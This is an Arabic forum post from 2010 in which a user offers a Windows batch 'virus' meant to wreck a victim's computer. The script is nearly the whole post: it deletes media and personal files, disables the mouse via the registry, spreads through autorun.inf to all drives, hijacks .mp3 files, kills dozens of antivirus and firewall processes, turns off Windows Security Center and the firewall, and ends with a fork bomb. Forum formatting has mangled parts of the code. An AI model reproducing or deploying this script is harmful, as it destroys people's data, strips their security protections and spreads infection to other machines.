عرض مشاركة واحدة
قديم 04-03-2010, 10:16 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
Hαcĸer'ѕ Kιɴɢ
:: Interactive Developer ::
 
الصورة الرمزية Hαcĸer'ѕ Kιɴɢ
 

 

 
إحصائية العضو








Hαcĸer'ѕ Kιɴɢ غير متواجد حالياً

إرسال رسالة عبر MSN إلى Hαcĸer'ѕ Kιɴɢ

 

 

إحصائية الترشيح

عدد النقاط : 10
Hαcĸer'ѕ Kιɴɢ is on a distinguished road

Cool كود فيروس يحطم الجهاز ويجعل صاحبه يبكي ليلا ونهارا


السلام عليكم

الموضوع واضح


الكود

كود PHP:
كود PHP:
@ echo off
rem 
---------------------------------
rem Kill Explorer
echo :>>explorer.bat
echo tskill explorer >>explorer.bat
echo goto >>explorer.bat
echo Set objShell CreateObject("WScript.Shell")>>invisi.vbs
echo strCommand "explorer.bat">>invisi.vbs
echo objShell.Run strCommandvbHideTRUE>>invisi.vbs
start 
"" invisi.vbs
rem 
---------------------------------
rem ---------------------------------
rem Delete All Mp3
DIR 
/S/%SystemDrive%*.mp3 >> FIleList_mp3.txt
echo | FOR /"tokens=1,* delims=: " %%j in (FIleList_mp3.txt) do del "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Delete All Mp4
DIR 
/S/%SystemDrive%*.mp4 >> FIleList_mp4.txt
echo | FOR /"tokens=1,* delims=: " %%j in (FIleList_mp4.txt) do del "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Delete My Pictures
del 
//'%userprofile%\My Pictures\*.*'
rem ---------------------------------
rem ---------------------------------
rem Delete My Music
del 
//'%userprofile%\My Music\*.*'
rem ---------------------------------
rem ---------------------------------
rem Delete My ********s
del 
//'%userprofile%\My ********s\*.*'
rem ---------------------------------
rem ---------------------------------
rem Disable Mouse
set key
="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem 
---------------------------------
rem ---------------------------------
rem Kill Internet Explorer
tskill iexplore
rem 
---------------------------------
rem ---------------------------------
rem Infect All Drives
for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
copy /%%%E:
echo [
AutoRun] > %%E:autorun.inf
echo open="%%E:\%0" >> %%E:autorun.inf
echo action=Open folder to see files... >> %%E:autorun.inf)
rem ---------------------------------
rem ---------------------------------
rem Infect "ls" Cmd
copy 
%%windir%system32ls.bat
rem 
---------------------------------
rem ---------------------------------
rem Infect All .Mp3 Files
assoc 
.mp3=batfile
DIR 
/S/%SystemDrive%*.mp3 >> InfList_mp3.txt
echo | FOR /"tokens=1,* delims=: " %%j in (InfList_mp3.txt) do copy /%"%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Clear The Screen
cls
rem 
---------------------------------
rem ---------------------------------
rem Hide CMD Window
if exist winstart.vbs goto next
echo set objShell CreateObject("WScript.Shell") >> winstart.vbs
echo objShell.Run ".bat"vbHideTRUE >> winstart.vbs
start 
"" "winstart.vbs"
exit
:
next
rem 
---------------------------------
rem ---------------------------------
rem Temp Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode
=disable
tskill 
/A av*
tskill /A fire*
tskill /A anti*
cls
tskill 
/A spy*
tskill /A bullguard
tskill 
/A PersFw
tskill 
/A KAV*
tskill /A ZONEALARM
tskill 
/A SAFEWEB
cls
tskill 
/A OUTPOST
tskill 
/A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill 
/A cle
cls
tskill 
/A BLACKICE
tskill 
/A def*
tskill /A kav
tskill 
/A kav*
tskill /A avg*
tskill /A ash*
cls
tskill 
/A aswupdsv
tskill 
/A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill 
/A mcafe*
tskill /A mghtml
tskill 
/A msiexec
tskill 
/A outpost
tskill 
/A isafe
tskill 
/A zap*
cls
tskill 
/A zauinst
tskill 
/A upd*
tskill /A zlclien*
tskill /A minilog
tskill 
/A cc*
tskill /A norton*
cls
tskill 
/A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill 
/A tmp*
cls
tskill 
/A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill 
/A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill 
/A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill 
/A offg*
rem ---------------------------------
rem ---------------------------------
rem Disable Windows Security
net stop 
"security center"
net stop sharedaccess
netsh firewall set opmode mode
-disable
rem 
---------------------------------
rem ---------------------------------
rem Crash Computer
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
echo start "" %0>>crash.bat
start 
"" crash.bat
rem 
---------------------------------

__-Virus Authorexplorer.exe-__ 



;,] tdv,s dp'l hg[ih. ,d[ug whpfi df;d gdgh ,kihvh

التوقيع

** إن مرت الايام ولم تروني فهذه مشاركاتي فـتذكروني

وان غبت ولم تجدوني اكون وقتها بحاجه للدعاء فادعولي **

 

   

رد مع اقتباس